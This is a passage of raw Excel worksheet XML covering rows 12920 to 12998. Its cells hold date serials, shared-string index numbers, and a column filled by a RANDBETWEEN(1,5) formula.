      <c r="A12920" s="1">
        <v>43285.647581018522</v>
      </c>
      <c r="C12920" t="s">
        <v>10</v>
      </c>
      <c r="D12920" t="s">
        <v>374</v>
      </c>
      <c r="E12920" s="2" t="s">
        <v>11580</v>
      </c>
      <c r="F12920">
        <f t="shared" ca="1" si="201"/>
        <v>1</v>
      </c>
    </row>
    <row r="12921" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12921" s="1">
        <v>43285.646782407406</v>
      </c>
      <c r="C12921" t="s">
        <v>5634</v>
      </c>
      <c r="D12921" t="s">
        <v>374</v>
      </c>
      <c r="E12921" s="2" t="s">
        <v>11581</v>
      </c>
      <c r="F12921">
        <f t="shared" ca="1" si="201"/>
        <v>5</v>
      </c>
    </row>
    <row r="12922" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12922" s="1">
        <v>43285.626087962963</v>
      </c>
      <c r="C12922" t="s">
        <v>6</v>
      </c>
      <c r="D12922" t="s">
        <v>25</v>
      </c>
      <c r="E12922" s="2" t="s">
        <v>11582</v>
      </c>
      <c r="F12922">
        <f t="shared" ca="1" si="201"/>
        <v>2</v>
      </c>
    </row>
    <row r="12923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12923" s="1">
        <v>43285.603726851848</v>
      </c>
      <c r="C12923" t="s">
        <v>542</v>
      </c>
      <c r="F12923">
        <f t="shared" ca="1" si="201"/>
        <v>2</v>
      </c>
    </row>
    <row r="12924" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12924" s="1">
        <v>43285.598333333335</v>
      </c>
      <c r="C12924" t="s">
        <v>6829</v>
      </c>
      <c r="D12924" t="s">
        <v>1993</v>
      </c>
      <c r="E12924" s="2" t="s">
        <v>11583</v>
      </c>
      <c r="F12924">
        <f t="shared" ca="1" si="201"/>
        <v>4</v>
      </c>
    </row>
    <row r="12925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12925" s="1">
        <v>43285.58284722222</v>
      </c>
      <c r="C12925" t="s">
        <v>6</v>
      </c>
      <c r="D12925" t="s">
        <v>114</v>
      </c>
      <c r="E12925" t="s">
        <v>11584</v>
      </c>
      <c r="F12925">
        <f t="shared" ca="1" si="201"/>
        <v>2</v>
      </c>
    </row>
    <row r="12926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12926" s="1">
        <v>43285.578518518516</v>
      </c>
      <c r="C12926" t="s">
        <v>10</v>
      </c>
      <c r="D12926" t="s">
        <v>52</v>
      </c>
      <c r="E12926" t="s">
        <v>11585</v>
      </c>
      <c r="F12926">
        <f t="shared" ca="1" si="201"/>
        <v>3</v>
      </c>
    </row>
    <row r="12927" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12927" s="1">
        <v>43285.571111111109</v>
      </c>
      <c r="C12927" t="s">
        <v>260</v>
      </c>
      <c r="E12927" s="2" t="s">
        <v>11586</v>
      </c>
      <c r="F12927">
        <f t="shared" ca="1" si="201"/>
        <v>5</v>
      </c>
    </row>
    <row r="12928" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12928" s="1">
        <v>43285.562372685185</v>
      </c>
      <c r="C12928" t="s">
        <v>6</v>
      </c>
      <c r="D12928" t="s">
        <v>25</v>
      </c>
      <c r="E12928" s="2" t="s">
        <v>11587</v>
      </c>
      <c r="F12928">
        <f t="shared" ca="1" si="201"/>
        <v>1</v>
      </c>
    </row>
    <row r="12929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12929" s="1">
        <v>43285.537233796298</v>
      </c>
      <c r="C12929" t="s">
        <v>3994</v>
      </c>
      <c r="E12929" t="s">
        <v>11588</v>
      </c>
      <c r="F12929">
        <f t="shared" ca="1" si="201"/>
        <v>4</v>
      </c>
    </row>
    <row r="12930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12930" s="1">
        <v>43285.537222222221</v>
      </c>
      <c r="C12930" t="s">
        <v>3994</v>
      </c>
      <c r="E12930" t="s">
        <v>11588</v>
      </c>
      <c r="F12930">
        <f t="shared" ref="F12930:F12993" ca="1" si="202">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="12931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12931" s="1">
        <v>43285.537222222221</v>
      </c>
      <c r="C12931" t="s">
        <v>3994</v>
      </c>
      <c r="E12931" t="s">
        <v>11588</v>
      </c>
      <c r="F12931">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12932" s="1">
        <v>43285.516365740739</v>
      </c>
      <c r="C12932" t="s">
        <v>65</v>
      </c>
      <c r="E12932" t="s">
        <v>11589</v>
      </c>
      <c r="F12932">
        <f t="shared" ca="1" si="202"/>
        <v>3</v>
      </c>
    </row>
    <row r="12933" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12933" s="1">
        <v>43285.507557870369</v>
      </c>
      <c r="C12933" t="s">
        <v>4523</v>
      </c>
      <c r="D12933" t="s">
        <v>667</v>
      </c>
      <c r="E12933" s="2" t="s">
        <v>11590</v>
      </c>
      <c r="F12933">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12934" s="1">
        <v>43285.491724537038</v>
      </c>
      <c r="C12934" t="s">
        <v>6</v>
      </c>
      <c r="D12934" t="s">
        <v>25</v>
      </c>
      <c r="E12934" t="s">
        <v>11591</v>
      </c>
      <c r="F12934">
        <f t="shared" ca="1" si="202"/>
        <v>3</v>
      </c>
    </row>
    <row r="12935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12935" s="1">
        <v>43285.483946759261</v>
      </c>
      <c r="C12935" t="s">
        <v>6</v>
      </c>
      <c r="D12935" t="s">
        <v>25</v>
      </c>
      <c r="E12935" t="s">
        <v>11592</v>
      </c>
      <c r="F12935">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12936" s="1">
        <v>43285.470486111109</v>
      </c>
      <c r="C12936" t="s">
        <v>6</v>
      </c>
      <c r="D12936" t="s">
        <v>194</v>
      </c>
      <c r="E12936" t="s">
        <v>11593</v>
      </c>
      <c r="F12936">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12937" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12937" s="1">
        <v>43285.460625</v>
      </c>
      <c r="C12937" t="s">
        <v>5634</v>
      </c>
      <c r="D12937" t="s">
        <v>367</v>
      </c>
      <c r="E12937" s="2" t="s">
        <v>11594</v>
      </c>
      <c r="F12937">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12938" s="1">
        <v>43285.448263888888</v>
      </c>
      <c r="C12938" t="s">
        <v>6</v>
      </c>
      <c r="D12938" t="s">
        <v>194</v>
      </c>
      <c r="E12938" t="s">
        <v>11595</v>
      </c>
      <c r="F12938">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12939" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12939" s="1">
        <v>43285.447430555556</v>
      </c>
      <c r="C12939" t="s">
        <v>124</v>
      </c>
      <c r="E12939" s="2" t="s">
        <v>11596</v>
      </c>
      <c r="F12939">
        <f t="shared" ca="1" si="202"/>
        <v>3</v>
      </c>
    </row>
    <row r="12940" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12940" s="1">
        <v>43285.422939814816</v>
      </c>
      <c r="C12940" t="s">
        <v>6</v>
      </c>
      <c r="D12940" t="s">
        <v>25</v>
      </c>
      <c r="E12940" t="s">
        <v>11597</v>
      </c>
      <c r="F12940">
        <f t="shared" ca="1" si="202"/>
        <v>3</v>
      </c>
    </row>
    <row r="12941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12941" s="1">
        <v>43285.42291666667</v>
      </c>
      <c r="C12941" t="s">
        <v>6</v>
      </c>
      <c r="D12941" t="s">
        <v>25</v>
      </c>
      <c r="E12941" t="s">
        <v>11597</v>
      </c>
      <c r="F12941">
        <f t="shared" ca="1" si="202"/>
        <v>3</v>
      </c>
    </row>
    <row r="12942" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12942" s="1">
        <v>43285.420960648145</v>
      </c>
      <c r="C12942" t="s">
        <v>6</v>
      </c>
      <c r="D12942" t="s">
        <v>25</v>
      </c>
      <c r="E12942" s="2" t="s">
        <v>11598</v>
      </c>
      <c r="F12942">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12943" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12943" s="1">
        <v>43285.415208333332</v>
      </c>
      <c r="C12943" t="s">
        <v>17</v>
      </c>
      <c r="E12943" s="2" t="s">
        <v>11599</v>
      </c>
      <c r="F12943">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12944" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12944" s="1">
        <v>43285.401087962964</v>
      </c>
      <c r="C12944" t="s">
        <v>48</v>
      </c>
      <c r="E12944" t="s">
        <v>11600</v>
      </c>
      <c r="F12944">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12945" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12945" s="1">
        <v>43285.400810185187</v>
      </c>
      <c r="C12945" t="s">
        <v>71</v>
      </c>
      <c r="E12945" s="2" t="s">
        <v>11601</v>
      </c>
      <c r="F12945">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12946" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12946" s="1">
        <v>43285.400520833333</v>
      </c>
      <c r="C12946" t="s">
        <v>3049</v>
      </c>
      <c r="E12946" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F12946">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12947" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12947" s="1">
        <v>43285.399328703701</v>
      </c>
      <c r="C12947" t="s">
        <v>5634</v>
      </c>
      <c r="D12947" t="s">
        <v>2214</v>
      </c>
      <c r="E12947" s="2" t="s">
        <v>11602</v>
      </c>
      <c r="F12947">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12948" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12948" s="1">
        <v>43285.372812499998</v>
      </c>
      <c r="C12948" t="s">
        <v>71</v>
      </c>
      <c r="E12948" s="2" t="s">
        <v>11603</v>
      </c>
      <c r="F12948">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12949" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A12949" s="1">
        <v>43285.365115740744</v>
      </c>
      <c r="C12949" t="s">
        <v>71</v>
      </c>
      <c r="E12949" s="2" t="s">
        <v>11604</v>
      </c>
      <c r="F12949">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12950" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12950" s="1">
        <v>43285.335312499999</v>
      </c>
      <c r="C12950" t="s">
        <v>71</v>
      </c>
      <c r="E12950" t="s">
        <v>11605</v>
      </c>
      <c r="F12950">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12951" s="1">
        <v>43285.320752314816</v>
      </c>
      <c r="C12951" t="s">
        <v>41</v>
      </c>
      <c r="E12951" t="s">
        <v>11606</v>
      </c>
      <c r="F12951">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12952" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12952" s="1">
        <v>43285.317499999997</v>
      </c>
      <c r="C12952" t="s">
        <v>907</v>
      </c>
      <c r="E12952" t="s">
        <v>11607</v>
      </c>
      <c r="F12952">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12953" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12953" s="1">
        <v>43285.314687500002</v>
      </c>
      <c r="C12953" t="s">
        <v>124</v>
      </c>
      <c r="E12953" s="2" t="s">
        <v>11608</v>
      </c>
      <c r="F12953">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12954" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12954" s="1">
        <v>43285.251597222225</v>
      </c>
      <c r="C12954" t="s">
        <v>71</v>
      </c>
      <c r="E12954" s="2" t="s">
        <v>11609</v>
      </c>
      <c r="F12954">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12955" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12955" s="1">
        <v>43285.243171296293</v>
      </c>
      <c r="C12955" t="s">
        <v>43</v>
      </c>
      <c r="D12955" t="s">
        <v>232</v>
      </c>
      <c r="E12955" s="2" t="s">
        <v>11610</v>
      </c>
      <c r="F12955">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12956" s="1">
        <v>43285.237986111111</v>
      </c>
      <c r="C12956" t="s">
        <v>48</v>
      </c>
      <c r="E12956" t="s">
        <v>11611</v>
      </c>
      <c r="F12956">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12957" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12957" s="1">
        <v>43285.237743055557</v>
      </c>
      <c r="C12957" t="s">
        <v>260</v>
      </c>
      <c r="D12957" t="s">
        <v>1036</v>
      </c>
      <c r="E12957" s="2" t="s">
        <v>11612</v>
      </c>
      <c r="F12957">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12958" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A12958" s="1">
        <v>43285.218101851853</v>
      </c>
      <c r="C12958" t="s">
        <v>314</v>
      </c>
      <c r="E12958" s="2" t="s">
        <v>11613</v>
      </c>
      <c r="F12958">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12959" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A12959" s="1">
        <v>43285.201620370368</v>
      </c>
      <c r="C12959" t="s">
        <v>124</v>
      </c>
      <c r="E12959" s="2" t="s">
        <v>11614</v>
      </c>
      <c r="F12959">
        <f t="shared" ca="1" si="202"/>
        <v>3</v>
      </c>
    </row>
    <row r="12960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12960" s="1">
        <v>43285.150543981479</v>
      </c>
      <c r="C12960" t="s">
        <v>253</v>
      </c>
      <c r="E12960" t="s">
        <v>11615</v>
      </c>
      <c r="F12960">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12961" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12961" s="1">
        <v>43285.14880787037</v>
      </c>
      <c r="C12961" t="s">
        <v>134</v>
      </c>
      <c r="E12961" s="2" t="s">
        <v>11616</v>
      </c>
      <c r="F12961">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12962" s="1">
        <v>43285.139872685184</v>
      </c>
      <c r="C12962" t="s">
        <v>41</v>
      </c>
      <c r="E12962" t="s">
        <v>11617</v>
      </c>
      <c r="F12962">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12963" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12963" s="1">
        <v>43285.13962962963</v>
      </c>
      <c r="C12963" t="s">
        <v>5634</v>
      </c>
      <c r="D12963" t="s">
        <v>2214</v>
      </c>
      <c r="E12963" s="2" t="s">
        <v>11618</v>
      </c>
      <c r="F12963">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12964" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12964" s="1">
        <v>43285.126226851855</v>
      </c>
      <c r="C12964" t="s">
        <v>8808</v>
      </c>
      <c r="D12964" t="s">
        <v>33</v>
      </c>
      <c r="E12964" s="2" t="s">
        <v>11619</v>
      </c>
      <c r="F12964">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12965" s="1">
        <v>43285.106562499997</v>
      </c>
      <c r="C12965" t="s">
        <v>41</v>
      </c>
      <c r="E12965" t="s">
        <v>11620</v>
      </c>
      <c r="F12965">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12966" s="1">
        <v>43285.06863425926</v>
      </c>
      <c r="C12966" t="s">
        <v>318</v>
      </c>
      <c r="E12966" t="s">
        <v>11621</v>
      </c>
      <c r="F12966">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12967" s="1">
        <v>43285.058437500003</v>
      </c>
      <c r="C12967" t="s">
        <v>173</v>
      </c>
      <c r="D12967" t="s">
        <v>20</v>
      </c>
      <c r="E12967" t="s">
        <v>11156</v>
      </c>
      <c r="F12967">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12968" s="1">
        <v>43285.051539351851</v>
      </c>
      <c r="C12968" t="s">
        <v>41</v>
      </c>
      <c r="E12968" t="s">
        <v>11622</v>
      </c>
      <c r="F12968">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12969" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12969" s="1">
        <v>43284.989583333336</v>
      </c>
      <c r="C12969" t="s">
        <v>10</v>
      </c>
      <c r="D12969" t="s">
        <v>124</v>
      </c>
      <c r="E12969" s="2" t="s">
        <v>11623</v>
      </c>
      <c r="F12969">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12970" s="1">
        <v>43284.777326388888</v>
      </c>
      <c r="C12970" t="s">
        <v>318</v>
      </c>
      <c r="E12970" t="s">
        <v>11624</v>
      </c>
      <c r="F12970">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12971" s="1">
        <v>43284.725590277776</v>
      </c>
      <c r="C12971" t="s">
        <v>2214</v>
      </c>
      <c r="D12971" t="s">
        <v>229</v>
      </c>
      <c r="F12971">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12972" s="1">
        <v>43284.720381944448</v>
      </c>
      <c r="C12972" t="s">
        <v>10</v>
      </c>
      <c r="D12972" t="s">
        <v>46</v>
      </c>
      <c r="E12972" t="s">
        <v>11625</v>
      </c>
      <c r="F12972">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12973" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12973" s="1">
        <v>43284.669525462959</v>
      </c>
      <c r="C12973" t="s">
        <v>10</v>
      </c>
      <c r="D12973" t="s">
        <v>17</v>
      </c>
      <c r="E12973" s="2" t="s">
        <v>11626</v>
      </c>
      <c r="F12973">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12974" s="1">
        <v>43284.6252662037</v>
      </c>
      <c r="C12974" t="s">
        <v>10</v>
      </c>
      <c r="D12974" t="s">
        <v>6</v>
      </c>
      <c r="E12974" t="s">
        <v>11627</v>
      </c>
      <c r="F12974">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12975" s="1">
        <v>43284.612627314818</v>
      </c>
      <c r="C12975" t="s">
        <v>10</v>
      </c>
      <c r="D12975" t="s">
        <v>33</v>
      </c>
      <c r="E12975" t="s">
        <v>11628</v>
      </c>
      <c r="F12975">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12976" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12976" s="1">
        <v>43284.596562500003</v>
      </c>
      <c r="C12976" t="s">
        <v>6</v>
      </c>
      <c r="D12976" t="s">
        <v>194</v>
      </c>
      <c r="E12976" s="2" t="s">
        <v>11629</v>
      </c>
      <c r="F12976">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12977" s="1">
        <v>43284.594421296293</v>
      </c>
      <c r="C12977" t="s">
        <v>10</v>
      </c>
      <c r="D12977" t="s">
        <v>33</v>
      </c>
      <c r="E12977" t="s">
        <v>11628</v>
      </c>
      <c r="F12977">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12978" s="1">
        <v>43284.539467592593</v>
      </c>
      <c r="C12978" t="s">
        <v>41</v>
      </c>
      <c r="E12978" t="s">
        <v>11630</v>
      </c>
      <c r="F12978">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12979" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12979" s="1">
        <v>43284.50986111111</v>
      </c>
      <c r="C12979" t="s">
        <v>65</v>
      </c>
      <c r="E12979" s="2" t="s">
        <v>11631</v>
      </c>
      <c r="F12979">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12980" s="1">
        <v>43284.500856481478</v>
      </c>
      <c r="C12980" t="s">
        <v>10</v>
      </c>
      <c r="D12980" t="s">
        <v>14</v>
      </c>
      <c r="E12980" t="s">
        <v>11632</v>
      </c>
      <c r="F12980">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12981" s="1">
        <v>43284.485567129632</v>
      </c>
      <c r="C12981" t="s">
        <v>10</v>
      </c>
      <c r="D12981" t="s">
        <v>80</v>
      </c>
      <c r="E12981" t="s">
        <v>11633</v>
      </c>
      <c r="F12981">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12982" s="1">
        <v>43284.483437499999</v>
      </c>
      <c r="C12982" t="s">
        <v>50</v>
      </c>
      <c r="E12982" t="s">
        <v>11634</v>
      </c>
      <c r="F12982">
        <f t="shared" ca="1" si="202"/>
        <v>3</v>
      </c>
    </row>
    <row r="12983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12983" s="1">
        <v>43284.477592592593</v>
      </c>
      <c r="C12983" t="s">
        <v>260</v>
      </c>
      <c r="E12983" t="s">
        <v>11635</v>
      </c>
      <c r="F12983">
        <f t="shared" ca="1" si="202"/>
        <v>2</v>
      </c>
    </row>
    <row r="12984" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12984" s="1">
        <v>43284.477465277778</v>
      </c>
      <c r="C12984" t="s">
        <v>10</v>
      </c>
      <c r="D12984" t="s">
        <v>222</v>
      </c>
      <c r="E12984" t="s">
        <v>11636</v>
      </c>
      <c r="F12984">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12985" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12985" s="1">
        <v>43284.458402777775</v>
      </c>
      <c r="C12985" t="s">
        <v>6</v>
      </c>
      <c r="D12985" t="s">
        <v>25</v>
      </c>
      <c r="E12985" s="2" t="s">
        <v>11637</v>
      </c>
      <c r="F12985">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12986" s="1">
        <v>43284.448877314811</v>
      </c>
      <c r="C12986" t="s">
        <v>6</v>
      </c>
      <c r="D12986" t="s">
        <v>25</v>
      </c>
      <c r="E12986" t="s">
        <v>11638</v>
      </c>
      <c r="F12986">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12987" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12987" s="1">
        <v>43284.442650462966</v>
      </c>
      <c r="C12987" t="s">
        <v>48</v>
      </c>
      <c r="E12987" s="2" t="s">
        <v>11639</v>
      </c>
      <c r="F12987">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12988" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12988" s="1">
        <v>43284.43240740741</v>
      </c>
      <c r="C12988" t="s">
        <v>10</v>
      </c>
      <c r="D12988" t="s">
        <v>112</v>
      </c>
      <c r="E12988" s="2" t="s">
        <v>11640</v>
      </c>
      <c r="F12988">
        <f t="shared" ca="1" si="202"/>
        <v>5</v>
      </c>
    </row>
    <row r="12989" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12989" s="1">
        <v>43284.423981481479</v>
      </c>
      <c r="C12989" t="s">
        <v>6</v>
      </c>
      <c r="D12989" t="s">
        <v>25</v>
      </c>
      <c r="E12989" s="2" t="s">
        <v>11641</v>
      </c>
      <c r="F12989">
        <f t="shared" ca="1" si="202"/>
        <v>3</v>
      </c>
    </row>
    <row r="12990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12990" s="1">
        <v>43284.41815972222</v>
      </c>
      <c r="C12990" t="s">
        <v>10</v>
      </c>
      <c r="D12990" t="s">
        <v>89</v>
      </c>
      <c r="E12990" t="s">
        <v>11642</v>
      </c>
      <c r="F12990">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12991" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12991" s="1">
        <v>43284.407800925925</v>
      </c>
      <c r="C12991" t="s">
        <v>6</v>
      </c>
      <c r="D12991" t="s">
        <v>114</v>
      </c>
      <c r="E12991" s="2" t="s">
        <v>11643</v>
      </c>
      <c r="F12991">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12992" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A12992" s="1">
        <v>43284.407152777778</v>
      </c>
      <c r="C12992" t="s">
        <v>454</v>
      </c>
      <c r="E12992" s="2" t="s">
        <v>11644</v>
      </c>
      <c r="F12992">
        <f t="shared" ca="1" si="202"/>
        <v>4</v>
      </c>
    </row>
    <row r="12993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12993" s="1">
        <v>43284.405752314815</v>
      </c>
      <c r="C12993" t="s">
        <v>10</v>
      </c>
      <c r="D12993" t="s">
        <v>14</v>
      </c>
      <c r="E12993" t="s">
        <v>11645</v>
      </c>
      <c r="F12993">
        <f t="shared" ca="1" si="202"/>
        <v>1</v>
      </c>
    </row>
    <row r="12994" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12994" s="1">
        <v>43284.378831018519</v>
      </c>
      <c r="C12994" t="s">
        <v>41</v>
      </c>
      <c r="E12994" s="2" t="s">
        <v>11646</v>
      </c>
      <c r="F12994">
        <f t="shared" ref="F12994:F13057" ca="1" si="203">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="12995" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12995" s="1">
        <v>43284.376168981478</v>
      </c>
      <c r="C12995" t="s">
        <v>1068</v>
      </c>
      <c r="E12995" s="2" t="s">
        <v>11647</v>
      </c>
      <c r="F12995">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="12996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12996" s="1">
        <v>43284.351666666669</v>
      </c>
      <c r="C12996" t="s">
        <v>60</v>
      </c>
      <c r="E12996" t="s">
        <v>11648</v>
      </c>
      <c r="F12996">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="12997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12997" s="1">
        <v>43284.328692129631</v>
      </c>
      <c r="C12997" t="s">
        <v>173</v>
      </c>
      <c r="E12997" t="s">
        <v>11649</v>
      </c>
      <c r="F12997">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="12998" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12998" s="1">
        <v>43284.294965277775</v>
      </c>
      <c r="C12998" t="s">
        <v>2225</v>
      </c>
      <c r="D12998" t="s">
        <v>71</v>
      </c>
      <c r="E12998" s="2" t="s">
        <v>11650</v>
      </c>
      <c r="F12998">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
